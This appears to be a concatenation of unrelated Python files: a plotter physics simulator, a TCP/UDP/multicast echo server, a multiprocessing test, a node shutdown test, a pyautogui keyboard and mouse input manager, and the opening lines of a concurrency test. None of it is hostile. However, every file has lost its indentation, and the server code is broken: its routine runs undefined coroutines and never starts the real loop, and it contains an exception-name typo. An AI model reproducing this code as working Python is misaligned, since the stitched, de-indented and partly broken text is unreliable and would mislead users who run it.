def getVelocity(self):
x_vel = self.effector_velocity[0]
y_vel = self.effector_velocity[1]
return math.sqrt((x_vel**2) + (y_vel**2))
def clearStats(self):
self.stats.clear()
self.stats = {
'max_force_x_abs':0,
'max_force_y_abs':0,
'max_force_x':0,
'max_force_y':0,
'min_force_x':0,
'min_force_y':0,
'max_velocity_x':0,
'max_velocity_y':0,
'min_velocity_x':0,
'min_velocity_y':0
}
def getStats(self):
return self.stats
def pushState(self):
this_state = {
'effector_pos':self.effector_pos,
'effector_velocity':self.effector_velocity,
'logical_pos':self.logical_pos,
'current_time':self.current_time,
'current_phys_time':self.current_phys_time,
'step_count':self.step_count,
'current_image_time':self.current_image_time,
'image_count':self.image_count
}
self.state.append(this_state)
def popState(self):
if(len(self.state) <= 0):
raise Exception("No state pop.")
else:
this_state = self.state.pop()
self.effector_pos = this_state['effector_pos']
self.effector_velocity = this_state['effector_velocity']
self.logical_pos = this_state['logical_pos']
self.current_time = this_state['current_time']
self.current_phys_time = this_state['current_phys_time']
self.step_count = this_state['step_count']
self.current_image_time = this_state['current_image_time']
self.image_count = this_state['image_count']
def saveImage(self, draw=False):
if(self.drawn_image is None and self.image_output_dir):
self.drawn_image = PIL.Image.new("RGBA", self.image_size)
while(self.current_phys_time > self.current_image_time and self.image_output_dir):
effector_draw_x = (self.effector_pos[0] * self.image_scale) + self.image_center_offset[0]
effector_draw_y = (self.effector_pos[1] * self.image_scale) + self.image_center_offset[1]
logical_draw_x = (self.logical_pos[0] * self.image_scale) + self.image_center_offset[0]
logical_draw_y = (self.logical_pos[1] * self.image_scale) + self.image_center_offset[1]
if(draw):
drawer = PIL.ImageDraw.Draw(self.drawn_image)
drawer.point((effector_draw_x, effector_draw_y), fill=(255, 255, 255, 255))
del drawer
img = self.drawn_image.copy()
drawer = PIL.ImageDraw.Draw(img)
drawer.line([effector_draw_x, effector_draw_y, effector_draw_x, effector_draw_y], fill=(255,0,0,255))
drawer.line([logical_draw_x, logical_draw_y, logical_draw_x, logical_draw_y], fill=(0,0,255,255))
drawer.line([effector_draw_x, effector_draw_y, logical_draw_x, logical_draw_y], fill=(0,255,0,255))
drawer.text((0,0),"%.5f"%(self.current_image_time), fill=(255,255,255,255))
del drawer
slash = '' if self.image_output_dir.endswith('/') else '/'
file_name = self.image_output_dir + slash + "%05d.png"%(self.image_count)
print("Saving image "+str(file_name))
img.save(file_name, "PNG")
self.current_image_time += self.image_time_step
self.image_count += 1
def stepPhysics(self, draw=False):
while(self.current_phys_time < self.current_time):
offset_x = self.logical_pos[0] - self.effector_pos[0]
offset_y = self.logical_pos[1] - self.effector_pos[1]
#This is actually two separate system as the actuators for the plotter is an x-y system.
force_x = (offset_x * self.k_x) - (self.c_x * self.effector_velocity[0])
force_y = (offset_y * self.k_y) - (self.c_y * self.effector_velocity[1])
acceleration_x = force_x / self.x_mass # Don't include time as it's not a motion formula
acceleration_y = force_y / self.y_mass # Don't include time as it's not a motion formula
velocity_x = self.effector_velocity[0] + (acceleration_x * self.phys_time) #Include time as it's a motion formula
velocity_y = self.effector_velocity[1] + (acceleration_y * self.phys_time) #Include time as it's a motion formula
movement_x = self.effector_pos[0] + (velocity_x * self.phys_time)
movement_y = self.effector_pos[1] + (velocity_y * self.phys_time)
self.effector_velocity = (velocity_x, velocity_y)
self.effector_pos = (movement_x, movement_y)
self.saveImage(draw)
if(self.save_stats):
self.stats['max_force_x_abs'] = max(abs(force_x), self.stats['max_force_x_abs'])
self.stats['max_force_y_abs'] = max(abs(force_y), self.stats['max_force_y_abs'])
self.stats['max_force_x'] = max(force_x, self.stats['max_force_x'])
self.stats['max_force_y'] = max(force_y, self.stats['max_force_y'])
self.stats['min_force_x'] = min(force_x, self.stats['min_force_x'])
self.stats['min_force_y'] = min(force_y, self.stats['min_force_y'])
self.current_phys_time += self.phys_time
def step(self, step):
x_diff = 0
y_diff = 0
if(step.x_step == plotter_controller.StepDirection.FORWARD):
x_diff += 1
elif(step.x_step == plotter_controller.StepDirection.BACKWARDS):
x_diff -= 1
if(step.y_step == plotter_controller.StepDirection.FORWARD):
y_diff += 1
elif(step.y_step == plotter_controller.StepDirection.BACKWARDS):
y_diff -= 1
new_pos_x = self.logical_pos[0] + (x_diff * self.step_size)
new_pos_y = self.logical_pos[1] + (y_diff * self.step_size)
self.logical_pos = (new_pos_x, new_pos_y)
self.current_time += self.step_time
self.stepPhysics(draw=step.draw_value > 0)
self.step_count += 1
class PlotterSimulatorController(plotter_controller.PlotterController):
def __init__(self, step_data, step_time=0.001, buffer_size=1024, image_output_dir=None):
super(PlotterSimulatorController, self).__init__(step_data, step_time)
self.effector_pos = (0,0)
self.stepper_thread = None
self.data_thread = None
self.simulator = PlotterSimulator(step_time, step_time / 10, image_output_dir=image_output_dir)
self.buffer_size = buffer_size
self.load_buffer = []
self.consume_buffer = []
self.buffers = []
self.has_data = True
def wait(self):
self.stepper_thread.join()
self.data_thread.join()
#Buffer size should be large enough to handle latencies in the system.
def stepThreadFunc(self):
while(self.has_data):
#wait for data
#print(self.has_data, self.consume_buffer, self.load_buffer)
while(self.has_data and len(self.consume_buffer) <= 0):
time.sleep(0)
#print(self.consume_buffer, self.load_buffer)
start_time = time.time()
step_index = 0
while(len(self.consume_buffer) > 0):
step = self.consume_buffer.pop(0)
self.simulator.step(step)
step_index += 1
current_time = time.time()
next_step_time = start_time + ((step_index)*self.step_time)
sleep_time = max(next_step_time - current_time, 0)
time.sleep(sleep_time)
def dataThreadFunc(self):
while(self.step_data.hasData()):
step = self.step_data.getStep()
self.load_buffer.append(step)
if(len(self.load_buffer) >= self.buffer_size or not self.step_data.hasData()):
#Wait for consume buffer to empty
while(len(self.consume_buffer) > 0):
time.sleep(0)
#And now swap the buffers
temp_buffer = self.load_buffer
self.load_buffer = self.consume_buffer
self.consume_buffer = temp_buffer
time.sleep(0)
self.has_data = False
def start(self):
self.stepper_thread = threading.Thread(target=self.stepThreadFunc)
self.data_thread = threading.Thread(target=self.dataThreadFunc)
self.stepper_thread.start()
self.data_thread.start()
class RandomDataProvider(plotter_controller.StepDataProvider):
def __init__(self, number_of_data=1):
self.data_left = number_of_data
def getStep(self):
if(self.data_left <= 0):
raise Exception("Program crashed as the data provider is out of data")
else:
x_step = random.choice(list(plotter_controller.StepDirection))
y_step = random.choice(list(plotter_controller.StepDirection))
self.data_left -= 1
return plotter_controller.PlotterStep(x_step, y_step, draw_value=1)
def hasData(self):
return self.data_left > 0
import argparse
def main():
parser = argparse.ArgumentParser(description='Run a plotter simulator to show trajectory of a stepfile')
parser.add_argument('--stepfile', type=str, help="The serial port to use.")
parser.add_argument('--image-output-dir', type=str, help="A list of files to send to the plotter")
args = parser.parse_args()
data_provider = step_file_data_provider.StepFileDataProvider(args.stepfile) if args.stepfile else RandomDataProvider(number_of_data=10000)
image_output_dir = args.image_output_dir
controller = PlotterSimulatorController(data_provider, image_output_dir=image_output_dir)
controller.start()
controller.wait()
if __name__ == "__main__":
main()
|
srv_asyncio.py
|
from select import select
from socket import socket,inet_aton,getfqdn,gethostname,gethostbyname_ex,AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET,SO_REUSEADDR,SOL_IP, IP_DROP_MEMBERSHIP,IP_ADD_MEMBERSHIP,INADDR_ANY,IP_MULTICAST_TTL,IP_MULTICAST_LOOP
from threading import Thread,Condition
try:
from queue import Queue,Empty
except:
from Queue import Queue,Empty
import asyncio
import struct
class tcp_srv:
def __init__(self):
#sockets from which we except to read
self.inputs = []
#tcp connected client sockets
self.tcp_clients = []
#udp Outgoing message queues (socket:Queue)
self.udp_message_queue = None
#tcp connected clients Outgoing message queues (socket:Queue)
self.tcp_clients_message_queues = {}
self.tcp_server = []
self.udp_server = []
self.cast_server = []
self.__callback_dict = {}
self.__server_info = {}
self.__tcp_clients_info = {}
#A optional parameter for select is TIMEOUT
self.timeout = 3.0
self.client_timeout = 1.0
self.__tcp_callback = None
self.__tcp_err_callback = None
self.__udp_err_callback = None
self.__udp_callback = None
self.__multicast_callback = None
self.__thread_id = None
self.__client_thread_id = None
self._client_con_sig = Condition()
self.__quit = False
self.__client_quit = False
def start_server(self,sock_type='tcp',host='0.0.0.0',port=10086,multicast_ip=None):
#create a socket
__is_stream_sock = False
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] == sock_type and srv_info['port'] == port and srv_info['host'] == host and srv_info['multicast_ip'] == multicast_ip:
srv_info['req_stop'] = False
return server
if sock_type == 'tcp':
server = socket(AF_INET,SOCK_STREAM)
__is_stream_sock = True
else:
server = socket(AF_INET,SOCK_DGRAM)
__is_stream_sock = False
if self.udp_message_queue is None:
self.udp_message_queue = Queue()
#set option reused
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
print ('start srv:',sock_type,host,port,multicast_ip)
if not isinstance(host,str):
host = host.decode()
if __is_stream_sock is False:
if multicast_ip is not None:
if not isinstance(multicast_ip,str):
multicast_ip = multicast_ip.decode()
mreq = struct.pack('4sl',inet_aton(multicast_ip),int(INADDR_ANY))
server.setsockopt(SOL_IP, IP_MULTICAST_TTL, 2)
server.setsockopt(SOL_IP, IP_MULTICAST_LOOP, 0)
server.setsockopt(SOL_IP, IP_ADD_MEMBERSHIP, mreq)
self.cast_server.append(server)
else:
self.udp_server.append(server)
else:
self.tcp_server.append(server)
server.setblocking(False)
server.bind((host,port))
if __is_stream_sock is True:
server.listen(36)
self.__server_info.setdefault(server,{'sock_type':sock_type,'host':host,'port':port,'methods':{},'multicast_ip':multicast_ip,'req_stop':False})
self.inputs.append(server)
return server
def get_inet_aton(self,addr_str):
addr = inet_aton(addr_str)
#print ('addr',addr)
if isinstance(addr[0],int):
return (addr[0] << 24) + (addr[1] << 16) + (addr[2]<<8) + addr[3]
else:
return (ord(addr[0]) << 24) + (ord(addr[1]) << 16) + (ord(addr[2])<<8) + ord(addr[3])
def get_inet_ntoa(self,addr_uint):
return '%d.%d.%d.%d'%((addr_uint>>24)&0xff, (addr_uint>>16)&0xff, (addr_uint>>8)&0xff, addr_uint&0xff)
def get_own_addr_hash_list(self):
myname = getfqdn(gethostname())
ipList = gethostbyname_ex(myname)
#print (self._srv_s.getsockname())
addr_int_list = []
for addr in ipList[2]:
addr_int_list.append(self.get_inet_aton(addr))
#print (addr_int_list)
return addr_int_list
def do_send_udp_cast(self,msg,host='224.0.0.119',port=30000):
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] != 'tcp' and srv_info['multicast_ip'] is not None and srv_info['req_stop'] is False:
address = (srv_info['multicast_ip'],srv_info['port'])
self.udp_message_queue.put((server,address,msg))
return 0
return None
def send_data(self,cur_dev,real_send_str,mode=None):
ret = None
if cur_dev.startswith('udp'):
if self.udp_server:
addr = cur_dev[4:-1].split(':')
if len(addr) == 2 and addr[1].isdigit():
pear = (addr[0],int(addr[1]))
self.udp_message_queue.put((self.udp_server[0],pear,real_send_str))
ret = 0
elif cur_dev.startswith('tcp'):
#print ('send',cur_dev,real_send_str)
self._client_con_sig.acquire()
for client_sock,client_info in self.__tcp_clients_info.items():
#print (client_info['address'])
client_dev = "tcp(%s:%d)"%(client_info['address'][0],client_info['address'][1])
if client_dev == cur_dev and client_sock in self.tcp_clients_message_queues:
self.tcp_clients_message_queues[client_sock].put(real_send_str)
ret = 0
break
self._client_con_sig.release()
return ret
def stop_server(self,sock_type='tcp',host='0.0.0.0',port=10086,multicast_ip=None):
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] == sock_type and srv_info['port'] == port and srv_info['host'] == host and srv_info['multicast_ip'] == multicast_ip:
srv_info['req_stop'] = True
print ('stop srv:',sock_type,host,port,multicast_ip)
#print ('self.__server_info:',self.__server_info)
if len(self.inputs) == 0:
print ('stop server thread')
self.stop()
def set_callback(self,type='tcp',callback=None):
if type == 'tcp':
self.__tcp_callback = callback
elif type == 'udp_cast':
self.__multicast_callback = callback
elif type == 'tcp_err':
self.__tcp_err_callback = callback
elif type == 'udp_err':
self.__udp_err_callback = callback
else:
self.__udp_callback = callback
def register_function(self,server,req,callback_function):
if server in self.__server_info:
srv_info = self.__server_info[server]
if not isinstance(req,bytes):
req = req.encode()
srv_info['methods'].setdefault(req,callback_function)
return None
def run_client_manager(self):
self.__client_thread_id = Thread(target=self._client_routine,args=())
self.__client_thread_id.setDaemon(True)
self.__client_thread_id.start()
def run(self):
if len(self.inputs) == 0:
return
if self.__thread_id is not None and not self.__thread_id.isAlive():
self.__quit = True
self.__thread_id.join()
self.__thread_id = None
if self.__thread_id is None:
self.__quit = False
self.__thread_id = Thread(target=self.routine,args=())
self.__thread_id.start()
if self.__client_thread_id is None:
self.__client_quit = False
self.run_client_manager()
def stop(self):
self.__quit = True
self.__client_quit = True
if self.__thread_id is not None and self.__thread_id.isAlive():
self.__thread_id.join()
self.__thread_id = None
def __remove_client_connection(self, fd):
self._rm_client_connection(fd)
try:
fd.close()
except Exception as e:
print ('Exception in close/remove connection:%s'%e)
pass
def __remove_server(self, s):
if s in self.inputs:
self.inputs.remove(s)
if s in self.tcp_server:
self.tcp_server.remove(s)
if s in self.udp_server:
self.udp_server.remove(s)
if s in self.cast_server:
self.cast_server.remove(s)
try:
s.close()
except Exception as e:
print ('Exception in close s:%s'%e)
pass
def __check_req_stop_server(self):
#print ('__server_info',self.__server_info)
need_del_server = [server_sock for server_sock in self.__server_info.keys() if self.__server_info[server_sock]['req_stop'] == True]
#print ('need_del_server',need_del_server)
for server_sock in need_del_server:
multicast_ip = self.__server_info[server_sock]['multicast_ip']
if multicast_ip is not None and self.__server_info[server_sock]['sock_type'].startswith('udp'):
mreq = struct.pack('4sl',inet_aton(multicast_ip),INADDR_ANY)
server_sock.setsockopt(SOL_IP, IP_DROP_MEMBERSHIP, mreq)
self.__remove_server(server_sock)
del self.__server_info[server_sock]
#print ('new___server_info',self.__server_info)
return len(self.inputs)
def _add_client_connection(self,server_sock,client_sock,client_addr):
self._client_con_sig.acquire()
self.tcp_clients.append(client_sock)
if client_sock not in self.__tcp_clients_info:
self.__tcp_clients_info.setdefault(client_sock,{'active':True,'parent':server_sock,'address':client_addr})
self._client_con_sig.notifyAll()
self._client_con_sig.release()
def _rm_client_connection(self,client_sock):
self._client_con_sig.acquire()
if client_sock in self.tcp_clients:
self.tcp_clients.remove(client_sock)
if client_sock in self.__tcp_clients_info:
del self.__tcp_clients_info[client_sock]
self._client_con_sig.release()
def _client_routine(self,args=None):
while self.__client_quit is False:
tcp_clients_sets = []
self._client_con_sig.acquire()
tcp_clients_sets = self.tcp_clients
self._client_con_sig.release()
if not self.tcp_clients:
print ('tcp_clients_sets none')
self._client_con_sig.acquire()
self._client_con_sig.wait()
self._client_con_sig.release()
continue
readable , writable , exceptional = select(tcp_clients_sets, [], tcp_clients_sets, self.client_timeout)
#print ('tcp_clients',tcp_clients_sets)
# When timeout reached , select return three empty lists
for s in exceptional:
print (" exception condition on ", s.getpeername() )
#stop listening for input on the connection
self.__remove_client_connection(s)
for s in readable :
try:
__fx = s.fileno()
except Exceptions as e:
print (" get fileno err %s"%e)
self.__remove_client_connection(s)
pass
continue
skip_close = False
try:
pear = s.getpeername()
data = s.recv(2048)
if data :
#print (" received %s from %s" %(data ,pear) )
if s not in self.tcp_clients_message_queues:
self.tcp_clients_message_queues[s] = Queue()
if self.__tcp_callback is not None:
self.__tcp_callback(pear,self.__callback_dict,data)
if data.startswith(b'ECHO') or data.startswith(b'echo'):
self.tcp_clients_message_queues[s].put(data[4:])
else:
self.tcp_clients_message_queues[s].put(b'ACK%d\n'%len(data))
elif skip_close is False:
#Interpret empty result as closed connection
print (" closing ", pear )
if self.__tcp_err_callback is not None:
self.__tcp_err_callback(pear,self.__callback_dict,'close')
self.__remove_client_connection(s)
except Exception as e:
print ('Exception in recv %s, do close'%e)
if self.__tcp_err_callback is not None and pear is not None:
self.__tcp_err_callback(pear,self.__callback_dict,'close')
self.__remove_client_connection(s)
pass
if tcp_clients_sets:
_readable , _writable , _exceptional = select([], tcp_clients_sets, [], 0.001)
for s in _writable:
if s not in self.tcp_clients_message_queues:
continue
tcp_queue_empty = False
#try send udp ack msg
while tcp_queue_empty is False:
try:
send_msg = self.tcp_clients_message_queues[s].get_nowait()
except Empty:
#print (" queue empty", s.getpeername() )
tcp_queue_empty = True
pass
except Exception as e:
print (" queue err:%s in key%s\n"%(e,s) )
tcp_queue_empty = True
pass
else:
#print (" sending %s to %s" %(send_msg,str(s)) )
#for req,callback_function in self.__tcp_clients[s]['methods'].items():
# if next_msg.startswith(req):
# callback_function(pear,self.__callback_dict,next_msg)
s.send(send_msg)
else:
print ('srv_select client thread quit')
def routine(self,args=None):
loop = asyncio.get_event_loop()
tasks = [hello(), hello()]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
@asyncio.coroutine
def srv_routine(self,args=None):
while self.inputs and self.__quit is False:
if 0 == self.__check_req_stop_server():
break
readable , writable , exceptional = select(self.inputs, [], self.inputs, self.timeout)
#print (readable , writable , exceptional)
# When timeout reached , select return three empty lists
for s in readable :
if s in self.tcp_server:
# A "readable" socket is ready to accept a connection
try:
connection, client_address = s.accept()
#print (" connection from %s to %s\n"%(str(client_address),connection.getsockname()))
connection.setblocking(0)
self._add_client_connection(s,connection,client_address)
except Exception as e:
print ('Exception in accept %s'%e)
pass
elif s in self.udp_server or s in self.cast_server:
try:
next_msg, pear = s.recvfrom(4096)
if next_msg:
#print (" connection %s from %s to %s\n"% (str(next_msg),str(pear),s.getsockname()))
if self.__server_info[s]['multicast_ip'] is not None and self.__multicast_callback is not None:
self.__multicast_callback(pear,self.__callback_dict,next_msg)
elif self.__udp_callback is not None:
self.__udp_callback(pear,self.__callback_dict,next_msg)
for req,callback_function in self.__server_info[s]['methods'].items():
if next_msg.startswith(req):
callback_function(pear,self.__callback_dict,next_msg)
if next_msg.startswith(b'ECHO') or next_msg.startswith(b'echo'):
self.udp_message_queue.put((s,pear,next_msg[4:]))
elif self.__server_info[s]['multicast_ip'] is None:
self.udp_message_queue.put((s,pear,b'ACK%d\n'%len(next_msg)))
else:
print ('udp msg none', pear)
except Exception as e:
print ('Exception in udp recvfrom %s'%e)
#e.errno == socket.errno.EWOULDBLOCK:
pass
else:
print ('srv_select this should not runed')
udp_queue_empty = False
#try send udp ack msg
while udp_queue_empty is False:
try:
server_sock,pear,send_msg = self.udp_message_queue.get_nowait()
except Empty:
udp_queue_empty = True
pass
except Exception as e:
print ('get udp msg exception:%s'%e)
udp_queue_empty = True
pass
else:
if server_sock in self.udp_server or server_sock in self.cast_server:
try:
server_sock.sendto(send_msg,0,pear)
except Exception as e:
print ('srv_select sendto err:%s'%e)
pass
else:
print ('srv_select routine thread quit')
def __del__(self):
for s in self.tcp_server:
s.close()
for s in self.udp_server:
s.close()
for s in self.cast_server:
s.close()
for s in self.tcp_clients:
s.close()
for s,Q in self.tcp_clients_message_queues.items():
del Q
if '__main__' == __name__:
srv = tcp_srv()
def callback(pear,srv_info,msg_data):
print ('<==TCP [%s:%s]' %(pear,msg_data))
def udp_callback(pear,srv_info,msg_data):
print ('<==UDP [%s:%s]' %(pear,msg_data))
#srv1 = srv.start_server('udp','0.0.0.0',10086)
srv2 = srv.start_server('tcp','0.0.0.0',10086)
srv3 = srv.start_server('udp','0.0.0.0',10086,'224.0.0.119')
srv.set_callback('tcp',callback)
srv.set_callback('udp',udp_callback)
def show_cb_msg(a,b,c):
print('UDP',a,b,c)
def show_cb_msg2(a,b,c):
print('TCP',a,b,c)
#srv.register_function(srv1,'GET',show_cb_msg)
#srv.register_function(srv2,'GET',show_cb_msg2)
srv.register_function(srv3,'GET',show_cb_msg2)
srv.run()
while 1:
try:
send_str = raw_input()
except:
break
srv.stop()
|
multiprocess_testing.py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright © 2016 ButenkoMS. All rights reserved. Contacts: <gtalk@butenkoms.space>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from multiprocessing import Process, Queue
import os
from .multiprocessing_task_runner import SubprocessWorker
import sys
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <gtalk@butenkoms.space>"
__copyright__ = "Copyright © 2016 ButenkoMS. All rights reserved. Contacts: <gtalk@butenkoms.space>"
__credits__ = ["ButenkoMS <gtalk@butenkoms.space>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "1.0.0"
__maintainer__ = "ButenkoMS <gtalk@butenkoms.space>"
__email__ = "gtalk@butenkoms.space"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
def funct(inputData):
result = inputData[0] / inputData[1]
return result
if __name__ == '__main__':
process0 = SubprocessWorker(funct)
process1 = SubprocessWorker(funct)
process0.start()
process1.start()
data0 = (3, 2)
data1 = (5, 0)
process0.send_data_to_subprocess(data0)
process1.send_data_to_subprocess(data1)
try:
answer0 = process0.get_answer_from_subprocess()
print('answer0 = ', answer0)
answer1 = process1.get_answer_from_subprocess()
print('answer1 = ', answer1)
except:
print()
print('<<< BROAD EXCEPTION:')
print(sys.exc_info()[0])
print(sys.exc_info()[1])
print('>>>')
raise
process0.stop()
process1.stop()
#class Multi_Test:
#
# def __init__(self, queue):
# self.queue = queue
#
# def info(self, title):
# print(title)
# print('module name:', __name__)
# if hasattr(os, 'getppid'): # only available on Unix
# print('parent process:', os.getppid())
# print('process id:', os.getpid())
#
# def f(self, name):
# self.info('function f')
# print('hello', name[1])
# name[0].put('hello')
#
# def start_process(self, ):
# self.info('main line')
# p = Process(target=self.f, args=((self.queue, 'bob'),))
# p.start()
# p.join()
# print(self.queue.get())
#
#if __name__ == '__main__':
# q = Queue()
# mp = Multi_Test(q)
# mp.start_process()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BGLd shutdown."""
from test_framework.test_framework import BGLTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BGLTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
input_manager.py
|
from config.config import REPEAT_DELAY, REPEAT_RATE, IS_WINDOWS
import time
import pyautogui
pyautogui.FAILSAFE = False
pyautogui.PAUSE = 0.0
if (IS_WINDOWS == True):
import pydirectinput
pydirectinput.FAILSAFE=False
pydirectinput.PAUSE = 0.0
import threading
# Managers sending inputs to manipulate the keyboard or mouse, or to print out statements in testing mode
class InputManager:
function_mappings = {
'press': False,
'keyDown': False,
'keyUp': False,
'click': False,
'mouseDown': False,
'mouseUp': False,
}
special_keys = ['ctrl', 'shift', 'alt']
toggle_keys = {
'ctrl': False,
'shift': False,
'alt': False,
'up': False,
'down': False,
'left': False,
'right': False
}
key_hold_timings = {}
is_testing = False
use_direct_keys = False
# Used for input key up delays
input_release_lag_ms = 0
press_timings = {}
input_release_thread = None
def __init__(self, is_testing = False, repeat_delay=REPEAT_DELAY, repeat_rate=REPEAT_RATE, use_direct_keys=False, input_release_lag_ms=0):
self.is_testing = is_testing
self.repeat_delay = repeat_delay
self.repeat_rate_ms = round(1000 / repeat_rate) / 1000
# When we need to add an input delay to every key press ( because the game we are playing has a lot of input lag )
# We start up a new thread to make sure the execution of the program goes as smooth as possible
self.input_release_lag_ms = input_release_lag_ms
if (self.input_release_lag_ms > 0):
self.input_release_thread = threading.Thread(name='input_release_thread', target=input_release_thread, args=(self, self.input_release_lag_ms / 1000 ) )
self.input_release_thread.setDaemon( True )
self.input_release_thread.start()
# Use DirectX keys - Needed in some programs that do not capture virtual keycodes
self.use_direct_keys = use_direct_keys
if (use_direct_keys == True):
print("Using DirectX keycodes" )
if( is_testing ):
self.function_mappings['press'] = self.pressTest
self.function_mappings['keyDown'] = self.keyDownTest
self.function_mappings['keyUp'] = self.keyUpTest
self.function_mappings['click'] = self.clickTest
self.function_mappings['mouseDown'] = self.mouseDownTest
self.function_mappings['mouseUp'] = self.mouseUpTest
elif (self.use_direct_keys == True and IS_WINDOWS == True):
self.function_mappings['press'] = self.pressActionDirect
self.function_mappings['keyDown'] = self.keyDownActionDirect
self.function_mappings['keyUp'] = self.keyUpActionDirect
self.function_mappings['click'] = self.clickActionDirect
self.function_mappings['mouseDown'] = self.mouseDownActionDirect
self.function_mappings['mouseUp'] = self.mouseUpActionDirect
else:
self.function_mappings['press'] = self.pressAction
self.function_mappings['keyDown'] = self.keyDownAction
self.function_mappings['keyUp'] = self.keyUpAction
self.function_mappings['click'] = self.clickAction
self.function_mappings['mouseDown'] = self.mouseDownAction
self.function_mappings['mouseUp'] = self.mouseUpAction
def __del__(self):
if(self.input_release_thread is not None):
for key in self.press_timings:
self.keyUp(key)
def press( self, key ):
if (self.input_release_lag_ms == 0):
self.function_mappings['press'](key)
elif (key not in self.press_timings ):
self.press_timings[key] = time.time()
self.keyDown(key)
def keyDown( self, key ):
self.function_mappings['keyDown'](key)
def hold( self, key, repeat_rate_ms=0 ):
if( repeat_rate_ms == 0 ):
repeat_rate_ms = self.repeat_rate_ms
if( key in self.toggle_keys.keys() ):
if (self.toggle_keys[key] == False):
self.keyDown( key )
self.toggle_keys[ key ] = True
else:
if( key not in self.key_hold_timings ):
self.key_hold_timings[key] = time.time()
self.press(key)
elif( time.time() - self.key_hold_timings[ key ] > self.repeat_delay ):
self.key_hold_timings[ key ] += repeat_rate_ms
self.press(key)
def release_non_toggle_keys( self ):
heldDownKeys = list(self.key_hold_timings)
for key in heldDownKeys:
if( key not in self.toggle_keys.keys() ):
self.release( key )
def release_special_keys( self ):
for key in self.special_keys:
if( self.toggle_keys[ key ] == True ):
self.release( key )
def release( self, key ):
if( self.is_testing ):
print( "-> RELEASING " + key )
if( key in self.toggle_keys and self.toggle_keys[key] == True ):
self.keyUp( key )
self.toggle_keys[ key ] = False
elif( key in self.key_hold_timings ):
del self.key_hold_timings[key]
def keyUp( self, key ):
self.function_mappings['keyUp'](key)
def click( self, button='left' ):
self.function_mappings['click'](button)
def mouseUp( self, button='left' ):
self.function_mappings['mouseUp'](button)
def mouseDown( self, button='left' ):
self.function_mappings['mouseDown'](button)
# --------- ACTUAL PYAUTOGUI ACTIONS ---------
def pressAction(self, key):
print( "----------> PRESSING " + key )
pyautogui.press( key )
def keyDownAction(self, key):
print( "----------> HOLDING DOWN " + key )
pyautogui.keyDown( key )
def keyUpAction(self, key):
print( "----------> RELEASING " + key )
pyautogui.keyUp( key )
def holdAction( self, key ):
if( time.time() - self.last_key_timestamp > throttle ):
self.last_key_timestamp = time.time()
self.press( key )
def clickAction(self, button='left'):
print( "----------> CLICKING " + button )
pyautogui.click( button=button )
def mouseDownAction( self, button='left' ):
print( "----------> HOLDING DOWN MOUSE " + button )
pyautogui.mouseDown( button=button )
def mouseUpAction( self, button='left' ):
print( "----------> RELEASING MOUSE " + button )
pyautogui.mouseUp( button=button )
# --------- ACTUAL PYDIRECTINPUT ACTIONS ---------
def pressActionDirect(self, key):
print( "----------> PRESSING " + key )
pydirectinput.press( key )
def keyDownActionDirect(self, key):
print( "----------> HOLDING DOWN " + key )
pydirectinput.keyDown( key )
def keyUpActionDirect(self, key):
print( "----------> RELEASING " + key )
pydirectinput.keyUp( key )
def holdActionDirect( self, key ):
if( time.time() - self.last_key_timestamp > throttle ):
self.last_key_timestamp = time.time()
self.press( key )
def clickActionDirect(self, button='left'):
print( "----------> CLICKING " + button )
pydirectinput.click( button=button )
def mouseDownActionDirect( self, button='left' ):
print( "----------> HOLDING DOWN MOUSE " + button )
pydirectinput.mouseDown( button=button )
def mouseUpActionDirect( self, button='left' ):
print( "----------> RELEASING MOUSE " + button )
pydirectinput.mouseUp( button=button )
# --------- TEST METHODS FOR PRINTING ---------
def pressTest(self, key):
print( "-> Pressing " + key.upper() )
def keyDownTest(self, key):
print( "-> Holding down " + key.upper() )
def keyUpTest(self, key):
print( "-> Releasing " + key.upper() )
def holdTest(self, key):
print( "-> Pressing " + key.upper() )
def releaseTest(self, key):
print( "-> Releasing " + key.upper() )
def clickTest(self, button='left'):
print( "-> Clicking " + button.upper() + " mouse button" )
def mouseDownTest( self, button='left' ):
print( "-> Holding down " + button.upper() + " mouse button" )
def mouseUpTest( self, button='left' ):
print( "-> Releasing " + button.upper() + " mouse button" )
def input_release_thread( inputManager, loop_delay):
while(True):
current_time = time.time()
deleted_keys = []
for key in inputManager.press_timings:
if ( current_time - inputManager.press_timings[key] > loop_delay):
inputManager.keyUp(key)
deleted_keys.append(key)
for key in deleted_keys:
del inputManager.press_timings[key]
time.sleep(loop_delay / 4)
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
